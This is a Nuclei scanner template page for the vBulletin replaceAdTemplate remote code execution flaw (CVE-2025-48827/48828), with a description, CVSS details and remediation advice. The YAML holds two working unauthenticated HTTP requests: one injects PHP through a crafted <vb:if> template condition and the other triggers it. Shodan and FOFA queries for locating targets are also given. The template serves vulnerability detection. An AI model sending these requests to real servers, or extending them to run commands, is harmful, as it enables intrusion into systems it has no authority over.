vBulletin replaceAdTemplate - Remote Code Execution
vbulletin-replacead-rce
Verified
Description
vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
Severity
Critical
CVSS Score
10
Affected Product
vbulletin
Published Date
May 24, 2025
Template Author
dhiyaneshdk, chocapikk
vbulletin-replacead-rce.yaml
id: vbulletin-replacead-rce
info:
name: vBulletin replaceAdTemplate - Remote Code Execution
author: DhiyaneshDK, Chocapikk
severity: critical
description: |
vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
impact: |
Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
remediation: |
Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
reference:
- https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
- https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
- https://nvd.nist.gov/vuln/detail/CVE-2025-48827
- https://nvd.nist.gov/vuln/detail/CVE-2025-48828
classification:
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-48827, CVE-2025-48828
cwe-id: CWE-424
metadata:
verified: true
max-request: 1
vendor: vbulletin
product: vbulletin
fofa-query: app="vBulletin"
shodan-query: http.component:"vBulletin"
tags: cve,cve2025,rce,vbulletin,intrusive
variables:
rand_string: "{{to_lower(rand_base(5))}}"
rand_value: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body,'string(5)','{{rand_value}}')
condition: and
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
routestring=ajax/render/ad_{{rand_string}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body,'string(5)','{{rand_value}}')
condition: and
# digest: 4a0a00473045022100bea79f305c0a04204c85204dc770aa07bbdb4a16ada12ca5a7a3a0180d27be0d022017bbeb5c40deb616bb74977e0e74e707345dee71a7cc69737eb3d722fc4f0625:922c64590222798bb761d5b6d8e7295010.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-48827cve-2025-48828
CWE ID:
cwe-424
Remediation Steps
Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.